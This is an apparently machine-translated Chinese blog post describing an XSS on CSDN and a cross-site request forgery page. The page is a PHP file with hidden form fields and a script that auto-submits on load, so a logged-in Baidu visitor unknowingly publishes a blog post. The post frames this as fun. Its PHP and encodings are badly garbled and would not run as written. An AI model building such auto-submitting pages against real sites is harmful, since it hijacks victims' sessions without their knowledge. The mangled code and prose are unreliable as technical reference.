From SecurityXiao xiaoshuai! Bytes ﹊
Ice's origin found an XSS of CSDN.
Xx. aspx? Username = xss
A page is constructed.
The content of www.0kee.com/pro/test.php is:
<? Php
$ Var k;
K = "<title> welcome to 0kee :) </title>"
K = k + "<body>"
K = k + "<form id =" form1 "name =" form1 "method =" post "action = http://hi.baidu.com/xsser/commit>
</Form>"
K = k + "<input type = text style = display: none! Important; display: block; width = 0; height = 0 value = 1 name = ct/>
<Input type = text style = display: none! Important; display: block; width = 0; height = 0 value = 1 name = cm/>
<Input type = text style = display: none! Important; display: block; width = 0; height = 0 value = http % 3A % 2F % 2Fhi.baidu.com % 2 Fxsser % 2 Fcreat % 2 Fblog % 2F name = spRefURL/>
<Input type = text style = display: none! Important; display: block; width = 0; height = 0 value = hello! Xsser name = spBlogTitle/>
<Input type = text style = display: none! Important; display: block; width = 0; height = 0 value = xsser! This is a test name = spBlogText/>
<Input type = text style = display: none! Important; display: block; width = 0; height = 0 value = % C4 % AC % C8 % CF % B7 % D6 % C0 % E name = spBlogCatName/>
<Input type = text style = display: none! Important; display: block; width = 0; height = 0 value = 1 name = spIsCmtAllow/>
<Input type = text style = display: none! Important; display: block; width = 0; height = 0 value = 1 name = spBlogPower/>
<Input type = text style = display: none! Important; display: block; width = 0; height = 0 value = 1 name = spVcode/>"
K = k + "</form>
<Script> document. form1.submit (); </script>"
Echo $ var;
?>
The user can see whether the page should be executed.
What is the displayed code after execution.
Of course it is from echo.
Document. form1.submit () is added to the page ()
This automatically submits the form =. =
For example, when you visit the cosine blog, the cockroach or sniperhg.
His Baidu status may be logon.
So.
This is equivalent to snierphg publishing an article named test.
The content is hello.
Check the value of spBlogText.
=. =
This is just for fun.
You can see that the XSS is connected out of the warehouse, not in the warehouse.
That is, you can play with chicken ribs.
=. =
Go to the thorn blog and the cosine blog to read a lot of things.
Although some do not understand, some may find it interesting and exciting.
In short, when sniperhg browses www.0kee.com/pro/test.php
On the page, the page completes the automatic submission of an article. In short, I published an article for him.